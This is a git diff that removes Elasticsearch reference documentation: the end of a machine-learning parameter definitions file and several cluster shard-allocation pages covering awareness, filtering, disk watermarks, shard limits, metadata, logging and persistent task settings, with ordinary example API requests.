-tag::model-plot-config-enabled[] -If true, enables calculation and storage of the model bounds for each entity -that is being analyzed. By default, this is not enabled. -end::model-plot-config-enabled[] - -tag::model-plot-config-terms[] -Limits data collection to this comma separated list of partition or by field -values. If terms are not specified or it is an empty string, no filtering is -applied. For example, "CPU,NetworkIn,DiskWrites". Wildcards are not supported. -Only the specified `terms` can be viewed when using the Single Metric Viewer. -end::model-plot-config-terms[] - -tag::model-snapshot-retention-days[] -Advanced configuration option, which affects the automatic removal of old model -snapshots for this job. It specifies the maximum period of time (in days) that -snapshots are retained. This period is relative to the timestamp of the most -recent snapshot for this job. The default value is `10`, which means snapshots -ten days older than the newest snapshot are deleted. For more information, refer -to {ml-docs}/ml-model-snapshots.html[Model snapshots]. -end::model-snapshot-retention-days[] - -tag::model-timestamp[] -The timestamp of the last record when the model stats were gathered. -end::model-timestamp[] - -tag::multivariate-by-fields[] -This functionality is reserved for internal use. It is not supported for use in -customer environments and is not subject to the support SLA of official GA -features. 
-+ --- -If set to `true`, the analysis will automatically find correlations between -metrics for a given `by` field value and report anomalies when those -correlations cease to hold. For example, suppose CPU and memory usage on host A -is usually highly correlated with the same metrics on host B. Perhaps this -correlation occurs because they are running a load-balanced application. -If you enable this property, then anomalies will be reported when, for example, -CPU usage on host A is high and the value of CPU usage on host B is low. That -is to say, you'll see an anomaly when the CPU of host A is unusual given -the CPU of host B. - -NOTE: To use the `multivariate_by_fields` property, you must also specify -`by_field_name` in your detector. - --- -end::multivariate-by-fields[] - -tag::n-neighbors[] -Defines the value for how many nearest neighbors each method of {oldetection} -uses to calculate its {olscore}. When the value is not set, different values are -used for different ensemble members. This deafault behavior helps improve the -diversity in the ensemble; only override it if you are confident that the value -you choose is appropriate for the data set. -end::n-neighbors[] - -tag::node-address[] -The network address of the node. -end::node-address[] - -tag::node-attributes[] -Lists node attributes such as `ml.machine_memory` or `ml.max_open_jobs` settings. -end::node-attributes[] - -tag::node-datafeeds[] -For started {dfeeds} only, this information pertains to the node upon which the -{dfeed} is started. -end::node-datafeeds[] - -tag::node-ephemeral-id[] -The ephemeral ID of the node. -end::node-ephemeral-id[] - -tag::node-id[] -The unique identifier of the node. -end::node-id[] - -tag::node-jobs[] -Contains properties for the node that runs the job. This information is -available only for open jobs. -end::node-jobs[] - -tag::node-transport-address[] -The host and port where transport HTTP connections are accepted. -end::node-transport-address[] - -tag::open-time[] -For open jobs only, the elapsed time for which the job has been open. -end::open-time[] - -tag::outlier-fraction[] -The proportion of the data set that is assumed to be outlying prior to -{oldetection}. For example, 0.05 means it is assumed that 5% of values are real -outliers and 95% are inliers. -end::outlier-fraction[] - -tag::out-of-order-timestamp-count[] -The number of input documents that are out of time sequence and outside -of the latency window. This information is applicable only when you provide data -to the {anomaly-job} by using the <>. These out of -order documents are discarded, since jobs require time series data to be in -ascending chronological order. -end::out-of-order-timestamp-count[] - -tag::over-field-name[] -The field used to split the data. In particular, this property is used for -analyzing the splits with respect to the history of all splits. It is used for -finding unusual values in the population of all splits. For more information, -see {ml-docs}/ml-configuring-populations.html[Performing population analysis]. -end::over-field-name[] - -tag::partition-field-name[] -The field used to segment the analysis. When you use this property, you have -completely independent baselines for each value of this field. -end::partition-field-name[] - -tag::peak-model-bytes[] -The peak number of bytes of memory ever used by the models. -end::peak-model-bytes[] - -tag::per-partition-categorization[] -Settings related to how categorization interacts with partition fields. 
-end::per-partition-categorization[] - -tag::per-partition-categorization-enabled[] -To enable this setting, you must also set the partition_field_name property to -the same value in every detector that uses the keyword mlcategory. Otherwise, -job creation fails. -end::per-partition-categorization-enabled[] - -tag::per-partition-categorization-stop-on-warn[] -This setting can be set to true only if per-partition categorization is enabled. -If true, both categorization and subsequent anomaly detection stops for -partitions where the categorization status changes to `warn`. This setting makes -it viable to have a job where it is expected that categorization works well for -some partitions but not others; you do not pay the cost of bad categorization -forever in the partitions where it works badly. -end::per-partition-categorization-stop-on-warn[] - -tag::prediction-field-name[] -Defines the name of the prediction field in the results. -Defaults to `_prediction`. -end::prediction-field-name[] - -tag::processed-field-count[] -The total number of fields in all the documents that have been processed by the -{anomaly-job}. Only fields that are specified in the detector configuration -object contribute to this count. The timestamp is not included in this count. -end::processed-field-count[] - -tag::processed-record-count[] -The number of input documents that have been processed by the {anomaly-job}. -This value includes documents with missing fields, since they are nonetheless -analyzed. If you use {dfeeds} and have aggregations in your search query, the -`processed_record_count` is the number of aggregation results processed, not the -number of {es} documents. -end::processed-record-count[] - -tag::query[] -The {es} query domain-specific language (DSL). This value corresponds to the -query object in an {es} search POST body. All the options that are supported by -{es} can be used, as this object is passed verbatim to {es}. By default, this -property has the following value: `{"match_all": {"boost": 1}}`. -end::query[] - -tag::query-delay[] -The number of seconds behind real time that data is queried. For example, if -data from 10:04 a.m. might not be searchable in {es} until 10:06 a.m., set this -property to 120 seconds. The default value is randomly selected between `60s` -and `120s`. This randomness improves the query performance when there are -multiple jobs running on the same node. For more information, see -{ml-docs}/ml-delayed-data-detection.html[Handling delayed data]. -end::query-delay[] - -tag::randomize-seed[] -Defines the seed to the random generator that is used to pick -which documents will be used for training. By default it is randomly generated. -Set it to a specific value to ensure the same documents are used for training -assuming other related parameters (e.g. `source`, `analyzed_fields`, etc.) are -the same. -end::randomize-seed[] - -tag::rare-category-count[] -The number of categories that match just one categorized document. -end::rare-category-count[] - -tag::renormalization-window-days[] -Advanced configuration option. The period over which adjustments to the score -are applied, as new data is seen. The default value is the longer of 30 days or -100 `bucket_spans`. -end::renormalization-window-days[] - -tag::results-index-name[] -A text string that affects the name of the {ml} results index. The default value -is `shared`, which generates an index named `.ml-anomalies-shared`. -end::results-index-name[] - -tag::results-retention-days[] -Advanced configuration option. 
The period of time (in days) that results are -retained. Age is calculated relative to the timestamp of the latest bucket -result. If this property has a non-null value, once per day at 00:30 (server -time), results that are the specified number of days older than the latest -bucket result are deleted from {es}. The default value is null, which means all -results are retained. -end::results-retention-days[] - -tag::retain[] -If `true`, this snapshot will not be deleted during automatic cleanup of -snapshots older than `model_snapshot_retention_days`. However, this snapshot -will be deleted when the job is deleted. The default value is `false`. -end::retain[] - -tag::script-fields[] -Specifies scripts that evaluate custom expressions and returns script fields to -the {dfeed}. The detector configuration objects in a job can contain functions -that use these script fields. For more information, see -{ml-docs}/ml-configuring-transform.html[Transforming data with script fields] -and <>. -end::script-fields[] - -tag::scroll-size[] -The `size` parameter that is used in {es} searches when the {dfeed} does not use -aggregations. The default value is `1000`. The maximum value is the value of -`index.max_result_window` which is 10,000 by default. -end::scroll-size[] - -tag::search-bucket-avg[] -The average search time per bucket, in milliseconds. -end::search-bucket-avg[] - -tag::search-count[] -The number of searches run by the {dfeed}. -end::search-count[] - -tag::search-exp-avg-hour[] -The exponential average search time per hour, in milliseconds. -end::search-exp-avg-hour[] - -tag::search-time[] -The total time the {dfeed} spent searching, in milliseconds. -end::search-time[] - -tag::size[] -Specifies the maximum number of {dfanalytics-jobs} to obtain. The default value -is `100`. -end::size[] - -tag::size-models[] -Specifies the maximum number of models to obtain. The default value -is `100`. -end::size-models[] - -tag::snapshot-id[] -A numerical character string that uniquely identifies the model snapshot. -end::snapshot-id[] - -tag::sparse-bucket-count[] -The number of buckets that contained few data points compared to the expected -number of data points. If your data contains many sparse buckets, consider using -a longer `bucket_span`. -end::sparse-bucket-count[] - -tag::standardization-enabled[] -If `true`, the following operation is performed on the columns before computing -{olscores}: (x_i - mean(x_i)) / sd(x_i). Defaults to `true`. For -more information about this concept, see -https://en.wikipedia.org/wiki/Feature_scaling#Standardization_(Z-score_Normalization)[Wikipedia]. -end::standardization-enabled[] - -tag::state-anomaly-job[] -The status of the {anomaly-job}, which can be one of the following values: -+ --- -* `closed`: The job finished successfully with its model state persisted. The -job must be opened before it can accept further data. -* `closing`: The job close action is in progress and has not yet completed. A -closing job cannot accept further data. -* `failed`: The job did not finish successfully due to an error. This situation -can occur due to invalid input data, a fatal error occurring during the -analysis, or an external interaction such as the process being killed by the -Linux out of memory (OOM) killer. If the job had irrevocably failed, it must be -force closed and then deleted. If the {dfeed} can be corrected, the job can be -closed and then re-opened. -* `opened`: The job is available to receive and process data. 
-* `opening`: The job open action is in progress and has not yet completed. --- -end::state-anomaly-job[] - -tag::state-datafeed[] -The status of the {dfeed}, which can be one of the following values: -+ --- -* `starting`: The {dfeed} has been requested to start but has not yet started. -* `started`: The {dfeed} is actively receiving data. -* `stopping`: The {dfeed} has been requested to stop gracefully and is -completing its final action. -* `stopped`: The {dfeed} is stopped and will not receive data until it is -re-started. --- -end::state-datafeed[] - -tag::summary-count-field-name[] -If this property is specified, the data that is fed to the job is expected to be -pre-summarized. This property value is the name of the field that contains the -count of raw data points that have been summarized. The same -`summary_count_field_name` applies to all detectors in the job. -+ --- -NOTE: The `summary_count_field_name` property cannot be used with the `metric` -function. - --- -end::summary-count-field-name[] - -tag::tags[] -A comma delimited string of tags. A trained model can have many tags, or none. -When supplied, only trained models that contain all the supplied tags are -returned. -end::tags[] - -tag::time-format[] -The time format, which can be `epoch`, `epoch_ms`, or a custom pattern. The -default value is `epoch`, which refers to UNIX or Epoch time (the number of -seconds since 1 Jan 1970). The value `epoch_ms` indicates that time is measured -in milliseconds since the epoch. The `epoch` and `epoch_ms` time formats accept -either integer or real values. + -+ -NOTE: Custom patterns must conform to the Java `DateTimeFormatter` class. -When you use date-time formatting patterns, it is recommended that you provide -the full date, time and time zone. For example: `yyyy-MM-dd'T'HH:mm:ssX`. -If the pattern that you specify is not sufficient to produce a complete -timestamp, job creation fails. -end::time-format[] - -tag::time-span[] -The time span that each search will be querying. This setting is only applicable -when the mode is set to `manual`. For example: `3h`. -end::time-span[] - -tag::timeout-start[] -Controls the amount of time to wait until the {dfanalytics-job} starts. Defaults -to 20 seconds. -end::timeout-start[] - -tag::timeout-stop[] -Controls the amount of time to wait until the {dfanalytics-job} stops. Defaults -to 20 seconds. -end::timeout-stop[] - -tag::timestamp-results[] -The start time of the bucket for which these results were calculated. -end::timestamp-results[] - -tag::tokenizer[] -The name or definition of the <> to use after -character filters are applied. This property is compulsory if -`categorization_analyzer` is specified as an object. Machine learning provides a -tokenizer called `ml_classic` that tokenizes in the same way as the -non-customizable tokenizer in older versions of the product. If you want to use -that tokenizer but change the character or token filters, specify -`"tokenizer": "ml_classic"` in your `categorization_analyzer`. -end::tokenizer[] - -tag::total-by-field-count[] -The number of `by` field values that were analyzed by the models. This value is -cumulative for all detectors in the job. -end::total-by-field-count[] - -tag::total-category-count[] -The number of categories created by categorization. -end::total-category-count[] - -tag::total-over-field-count[] -The number of `over` field values that were analyzed by the models. This value -is cumulative for all detectors in the job. 
-end::total-over-field-count[] - -tag::total-partition-field-count[] -The number of `partition` field values that were analyzed by the models. This -value is cumulative for all detectors in the job. -end::total-partition-field-count[] - -tag::training-percent[] -Defines what percentage of the eligible documents that will -be used for training. Documents that are ignored by the analysis (for example -those that contain arrays with more than one value) won’t be included in the -calculation for used percentage. Defaults to `100`. -end::training-percent[] - -tag::use-null[] -Defines whether a new series is used as the null series when there is no value -for the by or partition fields. The default value is `false`. -end::use-null[] - -tag::verbose[] -Defines whether the stats response should be verbose. The default value is `false`. -end::verbose[] diff --git a/docs/reference/modules/cluster.asciidoc b/docs/reference/modules/cluster.asciidoc deleted file mode 100644 index 4b9ede54506..00000000000 --- a/docs/reference/modules/cluster.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[modules-cluster]] -=== Cluster-level shard allocation and routing settings - -_Shard allocation_ is the process of allocating shards to nodes. This can -happen during initial recovery, replica allocation, rebalancing, or -when nodes are added or removed. - -One of the main roles of the master is to decide which shards to allocate to -which nodes, and when to move shards between nodes in order to rebalance the -cluster. - -There are a number of settings available to control the shard allocation process: - -* <> control allocation and - rebalancing operations. - -* <> explains how Elasticsearch takes available - disk space into account, and the related settings. - -* <> and <> control how shards - can be distributed across different racks or availability zones. - -* <> allows certain nodes or groups of - nodes excluded from allocation so that they can be decommissioned. - -Besides these, there are a few other <>. - -include::cluster/shards_allocation.asciidoc[] - -include::cluster/disk_allocator.asciidoc[] - -include::cluster/allocation_awareness.asciidoc[] - -include::cluster/allocation_filtering.asciidoc[] - -include::cluster/misc.asciidoc[] diff --git a/docs/reference/modules/cluster/allocation_awareness.asciidoc b/docs/reference/modules/cluster/allocation_awareness.asciidoc deleted file mode 100644 index 1ca4c9d8b67..00000000000 --- a/docs/reference/modules/cluster/allocation_awareness.asciidoc +++ /dev/null @@ -1,108 +0,0 @@ -[[shard-allocation-awareness]] -==== Shard allocation awareness - -You can use custom node attributes as _awareness attributes_ to enable {es} -to take your physical hardware configuration into account when allocating shards. -If {es} knows which nodes are on the same physical server, in the same rack, or -in the same zone, it can distribute the primary shard and its replica shards to -minimise the risk of losing all shard copies in the event of a failure. - -When shard allocation awareness is enabled with the -<> -`cluster.routing.allocation.awareness.attributes` setting, shards are only -allocated to nodes that have values set for the specified awareness attributes. -If you use multiple awareness attributes, {es} considers each attribute -separately when allocating shards. - -By default {es} uses <> -to route search or GET requests. 
However, with the presence of allocation awareness -attributes {es} will prefer using shards in the same location (with the same -awareness attribute values) to process these requests. This behavior can be -disabled by specifying `export ES_JAVA_OPTS="$ES_JAVA_OPTS -Des.search.ignore_awareness_attributes=true"` -system property on every node that is part of the cluster. - -NOTE: The number of attribute values determines how many shard copies are -allocated in each location. If the number of nodes in each location is -unbalanced and there are a lot of replicas, replica shards might be left -unassigned. - -[[enabling-awareness]] -===== Enabling shard allocation awareness - -To enable shard allocation awareness: - -. Specify the location of each node with a custom node attribute. For example, -if you want Elasticsearch to distribute shards across different racks, you might -set an awareness attribute called `rack_id` in each node's `elasticsearch.yml` -config file. -+ -[source,yaml] --------------------------------------------------------- -node.attr.rack_id: rack_one --------------------------------------------------------- -+ -You can also set custom attributes when you start a node: -+ -[source,sh] --------------------------------------------------------- -`./bin/elasticsearch -Enode.attr.rack_id=rack_one` --------------------------------------------------------- - -. Tell {es} to take one or more awareness attributes into account when -allocating shards by setting -`cluster.routing.allocation.awareness.attributes` in *every* master-eligible -node's `elasticsearch.yml` config file. -+ --- -[source,yaml] --------------------------------------------------------- -cluster.routing.allocation.awareness.attributes: rack_id <1> --------------------------------------------------------- -<1> Specify multiple attributes as a comma-separated list. --- -+ -You can also use the -<> API to set or update -a cluster's awareness attributes. - -With this example configuration, if you start two nodes with -`node.attr.rack_id` set to `rack_one` and create an index with 5 primary -shards and 1 replica of each primary, all primaries and replicas are -allocated across the two nodes. - -If you add two nodes with `node.attr.rack_id` set to `rack_two`, -{es} moves shards to the new nodes, ensuring (if possible) -that no two copies of the same shard are in the same rack. - -If `rack_two` fails and takes down both its nodes, by default {es} -allocates the lost shard copies to nodes in `rack_one`. To prevent multiple -copies of a particular shard from being allocated in the same location, you can -enable forced awareness. - -[[forced-awareness]] -===== Forced awareness - -By default, if one location fails, Elasticsearch assigns all of the missing -replica shards to the remaining locations. While you might have sufficient -resources across all locations to host your primary and replica shards, a single -location might be unable to host *ALL* of the shards. - -To prevent a single location from being overloaded in the event of a failure, -you can set `cluster.routing.allocation.awareness.force` so no replicas are -allocated until nodes are available in another location. 
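As noted above, the awareness attributes can also be applied at runtime through the cluster update settings API rather than `elasticsearch.yml`. A minimal sketch, reusing the `rack_id` attribute from the earlier example (the attribute name is purely illustrative):

[source,console]
--------------------------------------------------
PUT _cluster/settings
{
  "persistent": {
    "cluster.routing.allocation.awareness.attributes": "rack_id"
  }
}
--------------------------------------------------

The `zone` example that follows continues with the static `elasticsearch.yml` form, adding forced awareness.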
- -For example, if you have an awareness attribute called `zone` and configure nodes -in `zone1` and `zone2`, you can use forced awareness to prevent Elasticsearch -from allocating replicas if only one zone is available: - -[source,yaml] -------------------------------------------------------------------- -cluster.routing.allocation.awareness.attributes: zone -cluster.routing.allocation.awareness.force.zone.values: zone1,zone2 <1> -------------------------------------------------------------------- -<1> Specify all possible values for the awareness attribute. - -With this example configuration, if you start two nodes with `node.attr.zone` set -to `zone1` and create an index with 5 shards and 1 replica, Elasticsearch creates -the index and allocates the 5 primary shards but no replicas. Replicas are -only allocated once nodes with `node.attr.zone` set to `zone2` are available. diff --git a/docs/reference/modules/cluster/allocation_filtering.asciidoc b/docs/reference/modules/cluster/allocation_filtering.asciidoc deleted file mode 100644 index 8aad7a97855..00000000000 --- a/docs/reference/modules/cluster/allocation_filtering.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[cluster-shard-allocation-filtering]] -==== Cluster-level shard allocation filtering - -You can use cluster-level shard allocation filters to control where {es} -allocates shards from any index. These cluster wide filters are applied in -conjunction with <> -and <>. - -Shard allocation filters can be based on custom node attributes or the built-in -`_name`, `_host_ip`, `_publish_ip`, `_ip`, `_host`, `_id` and `_tier` attributes. - -The `cluster.routing.allocation` settings are <>, enabling live indices to -be moved from one set of nodes to another. Shards are only relocated if it is -possible to do so without breaking another routing constraint, such as never -allocating a primary and replica shard on the same node. - -The most common use case for cluster-level shard allocation filtering is when -you want to decommission a node. To move shards off of a node prior to shutting -it down, you could create a filter that excludes the node by its IP address: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "cluster.routing.allocation.exclude._ip" : "10.0.0.1" - } -} --------------------------------------------------- - -[[cluster-routing-settings]] -===== Cluster routing settings - -`cluster.routing.allocation.include.{attribute}`:: - (<>) - Allocate shards to a node whose `{attribute}` has at least one of the - comma-separated values. - -`cluster.routing.allocation.require.{attribute}`:: - (<>) - Only allocate shards to a node whose `{attribute}` has _all_ of the - comma-separated values. - -`cluster.routing.allocation.exclude.{attribute}`:: - (<>) - Do not allocate shards to a node whose `{attribute}` has _any_ of the - comma-separated values. - -The cluster allocation settings support the following built-in attributes: - -[horizontal] -`_name`:: Match nodes by node name -`_host_ip`:: Match nodes by host IP address (IP associated with hostname) -`_publish_ip`:: Match nodes by publish IP address -`_ip`:: Match either `_host_ip` or `_publish_ip` -`_host`:: Match nodes by hostname -`_id`:: Match nodes by node id -`_tier`:: Match nodes by the node's <> role - -NOTE: `_tier` filtering is based on <> roles. Only -a subset of roles are <> roles, and the generic -<> will match any tier filtering. 
- - -You can use wildcards when specifying attribute values, for example: - -[source,console] ------------------------ -PUT _cluster/settings -{ - "transient": { - "cluster.routing.allocation.exclude._ip": "192.168.2.*" - } -} ------------------------ diff --git a/docs/reference/modules/cluster/disk_allocator.asciidoc b/docs/reference/modules/cluster/disk_allocator.asciidoc deleted file mode 100644 index 4e788a4e0f9..00000000000 --- a/docs/reference/modules/cluster/disk_allocator.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[[disk-based-shard-allocation]] -==== Disk-based shard allocation settings -[[disk-based-shard-allocation-description]] -// tag::disk-based-shard-allocation-description-tag[] - -The disk-based shard allocator ensures that all nodes have enough disk space -without performing more shard movements than necessary. It allocates shards -based on a pair of thresholds known as the _low watermark_ and the _high -watermark_. Its primary goal is to ensure that no node exceeds the high -watermark, or at least that any such overage is only temporary. If a node -exceeds the high watermark then {es} will solve this by moving some of its -shards onto other nodes in the cluster. - -NOTE: It is normal for nodes to temporarily exceed the high watermark from time -to time. - -The allocator also tries to keep nodes clear of the high watermark by -forbidding the allocation of more shards to a node that exceeds the low -watermark. Importantly, if all of your nodes have exceeded the low watermark -then no new shards can be allocated and {es} will not be able to move any -shards between nodes in order to keep the disk usage below the high watermark. -You must ensure that your cluster has enough disk space in total and that there -are always some nodes below the low watermark. - -Shard movements triggered by the disk-based shard allocator must also satisfy -all other shard allocation rules such as -<> and -<>. If these rules are too strict then they -can also prevent the shard movements needed to keep the nodes' disk usage under -control. If you are using <> then {es} automatically -configures allocation filtering rules to place shards within the appropriate -tier, which means that the disk-based shard allocator works independently -within each tier. - -If a node is filling up its disk faster than {es} can move shards elsewhere -then there is a risk that the disk will completely fill up. To prevent this, as -a last resort, once the disk usage reaches the _flood-stage_ watermark {es} -will block writes to indices with a shard on the affected node. It will also -continue to move shards onto the other nodes in the cluster. When disk usage -on the affected node drops below the high watermark, {es} automatically removes -the write block. - -[[disk-based-shard-allocation-does-not-balance]] -[TIP] -==== -It is normal for the nodes in your cluster to be using very different amounts -of disk space. The <> of the cluster -depends only on the number of shards on each node and the indices to which -those shards belong. It considers neither the sizes of these shards nor the -available disk space on each node, for the following reasons: - -* Disk usage changes over time. Balancing the disk usage of individual nodes -would require a lot more shard movements, perhaps even wastefully undoing -earlier movements. Moving a shard consumes resources such as I/O and network -bandwidth and may evict data from the filesystem cache.
These resources are -better spent handling your searches and indexing where possible. - -* A cluster with equal disk usage on every node typically performs no better -than one that has unequal disk usage, as long as no disk is too full. -==== - -You can use the following settings to control disk-based allocation: - -[[cluster-routing-disk-threshold]] -// tag::cluster-routing-disk-threshold-tag[] -`cluster.routing.allocation.disk.threshold_enabled` {ess-icon}:: -(<>) -Defaults to `true`. Set to `false` to disable the disk allocation decider. -// end::cluster-routing-disk-threshold-tag[] - -[[cluster-routing-watermark-low]] -// tag::cluster-routing-watermark-low-tag[] -`cluster.routing.allocation.disk.watermark.low` {ess-icon}:: -(<>) -Controls the low watermark for disk usage. It defaults to `85%`, meaning that {es} will not allocate shards to nodes that have more than 85% disk used. It can also be set to an absolute byte value (like `500mb`) to prevent {es} from allocating shards if less than the specified amount of space is available. This setting has no effect on the primary shards of newly-created indices but will prevent their replicas from being allocated. -// end::cluster-routing-watermark-low-tag[] - -[[cluster-routing-watermark-high]] -// tag::cluster-routing-watermark-high-tag[] -`cluster.routing.allocation.disk.watermark.high` {ess-icon}:: -(<>) -Controls the high watermark. It defaults to `90%`, meaning that {es} will attempt to relocate shards away from a node whose disk usage is above 90%. It can also be set to an absolute byte value (similarly to the low watermark) to relocate shards away from a node if it has less than the specified amount of free space. This setting affects the allocation of all shards, whether previously allocated or not. -// end::cluster-routing-watermark-high-tag[] - -`cluster.routing.allocation.disk.watermark.enable_for_single_data_node`:: - (<>) - For a single data node, the default is to disregard disk watermarks when - making an allocation decision. This is deprecated behavior and will be - changed in 8.0. This setting can be set to `true` to enable the - disk watermarks for a single data node cluster (will become default in 8.0). - -[[cluster-routing-flood-stage]] -// tag::cluster-routing-flood-stage-tag[] -`cluster.routing.allocation.disk.watermark.flood_stage` {ess-icon}:: -+ --- -(<>) -Controls the flood stage watermark, which defaults to 95%. {es} enforces a read-only index block (`index.blocks.read_only_allow_delete`) on every index that has one or more shards allocated on the node, and that has at least one disk exceeding the flood stage. This setting is a last resort to prevent nodes from running out of disk space. The index block is automatically released when the disk utilization falls below the high watermark. - -NOTE: You cannot mix the usage of percentage values and byte values within -these settings. Either all values are set to percentage values, or all are set to byte values. This enforcement is so that {es} can validate that the settings are internally consistent, ensuring that the low disk threshold is less than the high disk threshold, and the high disk threshold is less than the flood stage threshold. 
- -An example of resetting the read-only index block on the `my-index-000001` index: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.blocks.read_only_allow_delete": null -} --------------------------------------------------- -// TEST[setup:my_index] --- -// end::cluster-routing-flood-stage-tag[] - -`cluster.info.update.interval`:: - (<>) - How often {es} should check on disk usage for each node in the - cluster. Defaults to `30s`. - -`cluster.routing.allocation.disk.include_relocations`:: - - deprecated:[7.5.0, Future versions will always account for relocations.] - Defaults to +true+, which means that Elasticsearch will take into account - shards that are currently being relocated to the target node when computing - a node's disk usage. Taking relocating shards' sizes into account may, - however, mean that the disk usage for a node is incorrectly estimated on - the high side, since the relocation could be 90% complete and a recently - retrieved disk usage would include the total size of the relocating shard - as well as the space already used by the running relocation. - - -NOTE: Percentage values refer to used disk space, while byte values refer to -free disk space. This can be confusing, since it flips the meaning of high and -low. For example, it makes sense to set the low watermark to 10gb and the high -watermark to 5gb, but not the other way around. - -An example of updating the low watermark to at least 100 gigabytes free, a high -watermark of at least 50 gigabytes free, and a flood stage watermark of 10 -gigabytes free, and updating the information about the cluster every minute: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient": { - "cluster.routing.allocation.disk.watermark.low": "100gb", - "cluster.routing.allocation.disk.watermark.high": "50gb", - "cluster.routing.allocation.disk.watermark.flood_stage": "10gb", - "cluster.info.update.interval": "1m" - } -} --------------------------------------------------- diff --git a/docs/reference/modules/cluster/misc.asciidoc b/docs/reference/modules/cluster/misc.asciidoc deleted file mode 100644 index a12e8ca390a..00000000000 --- a/docs/reference/modules/cluster/misc.asciidoc +++ /dev/null @@ -1,179 +0,0 @@ -[[misc-cluster-settings]] -==== Miscellaneous cluster settings - -[[cluster-read-only]] -===== Metadata - -An entire cluster may be set to read-only with the following setting: - -`cluster.blocks.read_only`:: - (<>) - Make the whole cluster read only (indices do not accept write - operations), metadata is not allowed to be modified (create or delete - indices). - -`cluster.blocks.read_only_allow_delete`:: - (<>) - Identical to `cluster.blocks.read_only` but allows to delete indices - to free up resources. - -WARNING: Don't rely on this setting to prevent changes to your cluster. Any -user with access to the <> -API can make the cluster read-write again. - - -[[cluster-shard-limit]] -===== Cluster shard limit - -There is a soft limit on the number of shards in a cluster, based on the number -of nodes in the cluster. This is intended to prevent operations which may -unintentionally destabilize the cluster. - -IMPORTANT: This limit is intended as a safety net, not a sizing recommendation. The -exact number of shards your cluster can safely support depends on your hardware -configuration and workload, but should remain well below this limit in almost -all cases, as the default limit is set quite high. 
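To see how close a cluster already is to this limit, you can check the current shard totals before creating or restoring indices. A minimal sketch using the cluster health API (the `filter_path` query parameter is optional and only trims the response):

[source,console]
--------------------------------------------------
GET _cluster/health?filter_path=active_shards,unassigned_shards,number_of_data_nodes
--------------------------------------------------

Compare the reported counts against the limit calculation described below.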
- -If an operation, such as creating a new index, restoring a snapshot of an index, -or opening a closed index would lead to the number of shards in the cluster -going over this limit, the operation will fail with an error indicating the -shard limit. - -If the cluster is already over the limit, due to changes in node membership or -setting changes, all operations that create or open indices will fail until -either the limit is increased as described below, or some indices are -<> or <> to bring the -number of shards below the limit. - -The cluster shard limit defaults to 1,000 shards per data node. -Both primary and replica shards of all open indices count toward the limit, -including unassigned shards. -For example, an open index with 5 primary shards and 2 replicas counts as 15 shards. -Closed indices do not contribute to the shard count. - -You can dynamically adjust the cluster shard limit with the following setting: - -[[cluster-max-shards-per-node]] -`cluster.max_shards_per_node`:: -+ --- -(<>) -Limits the total number of primary and replica shards for the cluster. {es} -calculates the limit as follows: - -`cluster.max_shards_per_node * number of data nodes` - -Shards for closed indices do not count toward this limit. Defaults to `1000`. -A cluster with no data nodes is unlimited. - -{es} rejects any request that creates more shards than this limit allows. For -example, a cluster with a `cluster.max_shards_per_node` setting of `100` and -three data nodes has a shard limit of 300. If the cluster already contains 296 -shards, {es} rejects any request that adds five or more shards to the cluster. - -NOTE: This setting does not limit shards for individual nodes. To limit the -number of shards for each node, use the -<> -setting. --- - -[[user-defined-data]] -===== User-defined cluster metadata - -User-defined metadata can be stored and retrieved using the Cluster Settings API. -This can be used to store arbitrary, infrequently-changing data about the cluster -without the need to create an index to store it. This data may be stored using -any key prefixed with `cluster.metadata.`. For example, to store the email -address of the administrator of a cluster under the key `cluster.metadata.administrator`, -issue this request: - -[source,console] -------------------------------- -PUT /_cluster/settings -{ - "persistent": { - "cluster.metadata.administrator": "sysadmin@example.com" - } -} -------------------------------- - -IMPORTANT: User-defined cluster metadata is not intended to store sensitive or -confidential information. Any information stored in user-defined cluster -metadata will be viewable by anyone with access to the -<> API, and is recorded in the -{es} logs. - -[[cluster-max-tombstones]] -===== Index tombstones - -The cluster state maintains index tombstones to explicitly denote indices that -have been deleted. The number of tombstones maintained in the cluster state is -controlled by the following setting: - -`cluster.indices.tombstones.size`:: -(<>) -Index tombstones prevent nodes that are not part of the cluster when a delete -occurs from joining the cluster and reimporting the index as though the delete -was never issued. To keep the cluster state from growing huge we only keep the -last `cluster.indices.tombstones.size` deletes, which defaults to 500. You can -increase it if you expect nodes to be absent from the cluster and miss more -than 500 deletes. We think that is rare, thus the default. 
Tombstones don't take
-up much space, but we also think that a number like 50,000 is probably too big.
-
-include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description]
-You can use the <> to manage
-this situation.
-
-[[cluster-logger]]
-===== Logger
-
-The settings which control logging can be updated <> with the
-`logger.` prefix. For instance, to increase the logging level of the
-`indices.recovery` module to `DEBUG`, issue this request:
-
-[source,console]
--------------------------------
-PUT /_cluster/settings
-{
-  "transient": {
-    "logger.org.elasticsearch.indices.recovery": "DEBUG"
-  }
-}
--------------------------------
-
-
-[[persistent-tasks-allocation]]
-===== Persistent tasks allocation
-
-Plugins can create a kind of task called a persistent task. These tasks are
-usually long-lived and are stored in the cluster state, allowing the
-tasks to be revived after a full cluster restart.
-
-Every time a persistent task is created, the master node takes care of
-assigning the task to a node of the cluster, and the assigned node will then
-pick up the task and execute it locally. The process of assigning persistent
-tasks to nodes is controlled by the following settings:
-
-`cluster.persistent_tasks.allocation.enable`::
-+
---
-(<>)
-Enable or disable allocation for persistent tasks:
-
-* `all` - (default) Allows persistent tasks to be assigned to nodes
-* `none` - No allocations are allowed for any type of persistent task
-
-This setting does not affect the persistent tasks that are already being executed.
-Only newly created persistent tasks, or tasks that must be reassigned (after a node
-left the cluster, for example), are impacted by this setting.
---
-
-`cluster.persistent_tasks.allocation.recheck_interval`::
- (<>)
- The master node will automatically check whether persistent tasks need to
- be assigned when the cluster state changes significantly. However, there
- may be other factors, such as memory usage, that affect whether persistent
- tasks can be assigned to nodes but do not cause the cluster state to change.
- This setting controls how often assignment checks are performed to react to
- these factors. The default is 30 seconds. The minimum permitted value is 10
- seconds.
diff --git a/docs/reference/modules/cluster/shards_allocation.asciidoc b/docs/reference/modules/cluster/shards_allocation.asciidoc
deleted file mode 100644
index e26e732e345..00000000000
--- a/docs/reference/modules/cluster/shards_allocation.asciidoc
+++ /dev/null
@@ -1,140 +0,0 @@
